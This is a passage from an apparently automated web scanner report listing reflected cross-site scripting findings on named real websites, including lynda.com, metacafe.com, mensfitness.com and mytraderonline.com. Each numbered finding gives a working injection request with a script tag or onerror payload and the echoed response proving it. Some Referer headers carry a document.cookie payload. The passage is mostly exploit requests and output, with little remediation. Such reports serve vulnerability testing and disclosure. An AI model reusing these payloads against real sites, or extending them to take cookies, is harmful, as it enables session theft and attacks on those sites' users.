Set-Cookie: ASP.NET_SessionId=x1jrynjqotcfa2rylamwqo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x1jrynjqotcfa2rylamwqo55; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:44:06 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:44:06 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:44:06 GMT; path=/
X-Powered-By: ASP.NET
From: 284444-web5
Date: Tue, 25 Jan 2011 04:44:05 GMT
Connection: close
Content-Length: 25346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<span id="lblFullNameC">Joomla!c9632<script>alert(1)</script>217befb9173</span>
...[SNIP]...

4.1248. http://www.lynda.com/landing/softwaretraining.aspx [AWKeyWord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lynda.com
Path:   /landing/softwaretraining.aspx

Issue detail

The value of the AWKeyWord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e443"><script>alert(1)</script>5be96c53ac6 was submitted in the AWKeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!3e443"><script>alert(1)</script>5be96c53ac6&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw9CYMY; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=urwlgknvan4k0t30g0swfo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=urwlgknvan4k0t30g0swfo55; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:44:02 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:44:02 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:44:02 GMT; path=/
X-Powered-By: ASP.NET
From: 284448-web9
Date: Tue, 25 Jan 2011 04:44:01 GMT
Connection: close
Content-Length: 25380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<meta name="Description" content="Award winning training, tutorials and courses on Joomla!3e443"><script>alert(1)</script>5be96c53ac6 from lynda.com" />
...[SNIP]...

4.1249. http://www.lynda.com/landing/softwaretraining.aspx [Ptitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lynda.com
Path:   /landing/softwaretraining.aspx

Issue detail

The value of the Ptitle request parameter is copied into the HTML document as text between TITLE tags. The payload afa34</title><script>alert(1)</script>90dcbb388f5 was submitted in the Ptitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Onlineafa34</title><script>alert(1)</script>90dcbb388f5&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw6CYMJ; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=sgglef2wm5e5dfjij2bmrt3s; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sgglef2wm5e5dfjij2bmrt3s; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:44:50 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:44:50 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:44:50 GMT; path=/
X-Powered-By: ASP.NET
From: 284445-web6
Date: Tue, 25 Jan 2011 04:44:50 GMT
Connection: close
Content-Length: 24710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<title>
   Joomla Tutorials and Training Onlineafa34</title><script>alert(1)</script>90dcbb388f5
</title>
...[SNIP]...

4.1250. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a074f<script>alert(1)</script>c4a5acfda9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+cracka074f<script>alert(1)</script>c4a5acfda9b/page/419/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy cracka074f<script>alert(1)</script>c4a5acfda9b/page/419/x22'</span>
...[SNIP]...

4.1251. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e35f<script>alert(1)</script>b85cc6a8b1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+crack/page9e35f<script>alert(1)</script>b85cc6a8b1d/419/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy crack/page9e35f<script>alert(1)</script>b85cc6a8b1d/419/x22'</span>
...[SNIP]...

4.1252. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 523b0<script>alert(1)</script>4457b128473 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+crack/page/419523b0<script>alert(1)</script>4457b128473/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Content-Length: 56535
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy crack/page/419523b0<script>alert(1)</script>4457b128473/x22'</span>
...[SNIP]...

4.1253. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 68220<script>alert(1)</script>b9ef2a5c755 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+crack/page/419/x2268220<script>alert(1)</script>b9ef2a5c755 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:06:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy crack/page/419/x2268220<script>alert(1)</script>b9ef2a5c755'</span>
...[SNIP]...

4.1254. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52bf6"><script>alert(1)</script>b9c613ef1ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52bf6\"><script>alert(1)</script>b9c613ef1ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?52bf6"><script>alert(1)</script>b9c613ef1ae=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1295930677+173.193.214.243; path=/
Set-Cookie: PHPSESSID=2066f5014dd99ed5895639ad60fa9529; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form enctype="multipart/form-data" action="/?52bf6\"><script>alert(1)</script>b9c613ef1ae=1#usermessagea" method="post" class="cform" id="cformsform">
...[SNIP]...

4.1255. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mensfitness.com
Path:   /Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8c10"><a>3ada40ed7f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e8c10"><a>3ada40ed7f6/fitness/ab_exercises/136 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 2
Cache-Control: max-age=43197
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:45:57 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 45359

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>


<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/e8c10"><a>3ada40ed7f6/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.1256. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mensfitness.com
Path:   /Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ff40"><img%20src%3da%20onerror%3dalert(1)>d8f23d3077c was submitted in the REST URL parameter 1. This input was echoed as 1ff40"><img src=a onerror=alert(1)>d8f23d3077c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Tshirt_Workout1ff40"><img%20src%3da%20onerror%3dalert(1)>d8f23d3077c/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:58 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 3
Cache-Control: max-age=43197
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:46:54 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 45515

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>


<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/Tshirt_Workout1ff40"><img src=a onerror=alert(1)>d8f23d3077c/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.1257. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mensfitness.com
Path:   /Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload bbc05--><img%20src%3da%20onerror%3dalert(1)>8f6acbad9ad was submitted in the REST URL parameter 1. This input was echoed as bbc05--><img src=a onerror=alert(1)>8f6acbad9ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Tshirt_Workoutbbc05--><img%20src%3da%20onerror%3dalert(1)>8f6acbad9ad/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:22 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=43199
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:47:21 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107109 (MII-APC/1.6)
Connection: close
Content-Length: 45519

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>


<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/Tshirt_Workoutbbc05--><img src=a onerror=alert(1)>8f6acbad9ad/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.1258. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16b81"><script>alert(1)</script>80bba3d2c73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fplayer/?16b81"><script>alert(1)</script>80bba3d2c73=1 HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:52:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=18a11c79c01e9a9b09a0778483da6edc; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=cf383f91fc349aa7e59df72701c88ee2; expires=Wed, 25-Jan-2012 04:52:40 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%227df7ec86deb73de67e40953c3954dc60%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:52:40 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3585085612.20480.0000; expires=Tue, 25-Jan-2011 05:52:40 GMT; path=/
Content-Length: 162024

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Metacafe - Online Video Entertainment - Free video clips for your enjoyment" href="/fplayer/rss.xml?16b81"><script>alert(1)</script>80bba3d2c73=1" />
...[SNIP]...

4.1259. http://www.mister-wong.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f804"><img%20src%3da%20onerror%3dalert(1)>65919bb3738 was submitted in the REST URL parameter 1. This input was echoed as 5f804"><img src=a onerror=alert(1)>65919bb3738 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.php5f804"><img%20src%3da%20onerror%3dalert(1)>65919bb3738?action=addurl&bm_url={u}&bm_description={t} HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:48:46 GMT
Server: Apache
Set-Cookie: wongsess=9c8cde65c0dd40716ec19743fefa9f7f; expires=Fri, 25 Jan 2036 10:48:46 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5394
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div id="main" class="c_index.php5f804"><img src=a onerror=alert(1)>65919bb3738">
...[SNIP]...

4.1260. https://www.mytraderonline.com/css/promoCSS.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /css/promoCSS.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe3fe<script>alert(1)</script>0c8a8ecd74d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssfe3fe<script>alert(1)</script>0c8a8ecd74d/promoCSS.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:29:40 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26482


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/cssfe3fe<script>alert(1)</script>0c8a8ecd74d/promoCSS.php</span>
...[SNIP]...

4.1261. https://www.mytraderonline.com/css/tolhomecss.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /css/tolhomecss.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e53d4<script>alert(1)</script>05046dfdb22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /csse53d4<script>alert(1)</script>05046dfdb22/tolhomecss.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921299027%7C1298513299027%3B%20s_lv%3D1295921299028%7C1390529299028%3B%20s_lv_s%3DFirst%2520Visit%7C1295923099028%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:29:50 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/csse53d4<script>alert(1)</script>05046dfdb22/tolhomecss.php</span>
...[SNIP]...

4.1262. https://www.mytraderonline.com/javascript/master_s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /javascript/master_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe8c5<script>alert(1)</script>e83e0eff03b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptfe8c5<script>alert(1)</script>e83e0eff03b/master_s_code.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:29:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26493


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascriptfe8c5<script>alert(1)</script>e83e0eff03b/master_s_code.js</span>
...[SNIP]...

4.1263. https://www.mytraderonline.com/javascript/realmedia.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /javascript/realmedia.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e904d<script>alert(1)</script>f127adaefca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripte904d<script>alert(1)</script>f127adaefca/realmedia.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
